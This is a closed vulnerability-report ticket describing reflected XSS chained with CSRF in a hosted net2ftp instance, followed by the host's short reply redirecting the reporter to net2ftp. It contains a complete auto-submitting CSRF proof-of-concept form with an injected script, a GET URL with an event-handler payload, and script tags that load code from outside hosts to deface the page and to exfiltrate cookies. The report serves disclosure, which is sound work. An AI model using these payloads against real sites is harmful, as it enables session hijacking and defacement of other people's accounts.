- Status Closed
-
Assigned To
cbay - Private
Attached to Project: Security vulnerabilities
Opened by shivangmauryaa - 14.04.2025
Last edited by cbay - 14.04.2025
Opened by shivangmauryaa - 14.04.2025
Last edited by cbay - 14.04.2025
FS#153 - Reflected XSS via CSRF
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Description
A high-impact Stored/Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the url_withpw parameter of the POST request to https://net2ftp.alwaysdata.com/index.php.
Due to the absence of proper input sanitization and output encoding, it is possible to inject arbitrary JavaScript that gets executed in the context of the victim’s browser. This flaw becomes significantly more critical when chained with CSRF, as it allows a remote attacker to exploit a logged-in user's session without requiring any user interaction beyond simply visiting a malicious page.
Steps to reproduce
1. open browser visit https://net2ftp.alwaysdata.com/index.php 2. intercept request and paste below code
3. now you will see alert
Chaining with CSRf
1. make a file xss.html
2. paste the below code
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://net2ftp.alwaysdata.com/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="skin" value="shinra" /> <input type="hidden" name="language" value="en" /> <input type="hidden" name="protocol" value="FTP" /> <input type="hidden" name="ftpserver" value="1" /> <input type="hidden" name="ftpserverport" value="21" /> <input type="hidden" name="username" value="pHqghUme" /> <input type="hidden" name="password_encrypted" value="76A44335496474CB960FA0F2BBD5F54B" /> <input type="hidden" name="sshfingerprint" value="1" /> <input type="hidden" name="ftpmode" value="binary" /> <input type="hidden" name="passivemode" value="1" /> <input type="hidden" name="viewmode" value="list" /> <input type="hidden" name="sort" value="" /> <input type="hidden" name="sortorder" value="" /> <input type="hidden" name="consent_necessary" value="1" /> <input type="hidden" name="consent_preferences" value="1" /> <input type="hidden" name="consent_statistics" value="1" /> <input type="hidden" name="consent_personalized_ads" value="1" /> <input type="hidden" name="consent_nonpersonalized_ads" value="0" /> <input type="hidden" name="user_email" value="testing@example.com" /> <input type="hidden" name="state" value="bookmark" /> <input type="hidden" name="state2" value="main" /> <input type="hidden" name="directory" value="/1" /> <input type="hidden" name="url_withpw" value="/index.php?protocol=FTP&amp;ftpserver=1&amp;ftpserverport=21&amp;sshfingerprint=1&amp;username=pHqghUme&amp;password_encrypted=76A44335496474CB960FA0F2BBD5F54B&amp;language=en&amp;skin=shinra&amp;ftpmode=binary&amp;passivemode=1&amp;viewmode=list&amp;sort=&amp;sortorder=&amp;state=login_small&amp;state2=bookmark&amp;go_to_state=browse&amp;go_to_state2=main&amp;directory=%2F1&amp;entry='"()&%<zzz><ScRiPt >alert(9584)</ScRiPt>" /> <input type="hidden" name="url_withoutpw" value="/index.php?protocol=FTP&amp;ftpserver=1&amp;ftpserverport=21&amp;sshfingerprint=1&amp;username=pHqghUme&amp;language=en&amp;skin=shinra&amp;ftpmode=binary&amp;passivemode=1&amp;viewmode=list&amp;sort=&amp;sortorder=&amp;state=login_small&amp;state2=bookmark&amp;go_to_state=browse&amp;go_to_state2=main&amp;directory=%2F1&amp;entry=" /> <input type="hidden" name="text" value="net2ftp 1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>3. open the file you will see alert
Extra
we can deface page via XSS as well using payload : "><script src=https://jso-tools.z-x.my.id/raw/~/D2OR7UZJICY8P></script>
and exifilirate cookies :'"><script src=https://xss.report/c/shivangmauryaa></script>
on same endpoint parameter : url_withoutpw and go_to_state
are vulnerable
here is one more XSS on same endpoint via GET request however im not adding in different report because i the endpoints are same .
https://net2ftp.alwaysdata.com/index.php?directory=/1&entry=&ftpmode=binary&ftpserver=1&ftpserverport=21&go_to_state=teste%22oncontentvisibilityautostatechange=%22alert(1)%22%20%20style=%22content-visibility:auto%22&go_to_state2=main&language=en&passivemode=1&password_encrypted=76A44335496474CB960FA0F2BBD5F54B&protocol=FTP&skin=shinra&sort=&sortorder=&sshfingerprint=1&state=login_small&state2=bookmark&username=pHqghUme&viewmode=list
endpoint url_withoutpw is vulnerable same as the above CSRF
Hello,
We run the latest net2ftp version. If you've found a vulnerability in net2ftp, you should report it to them.
Kind regards,
Cyril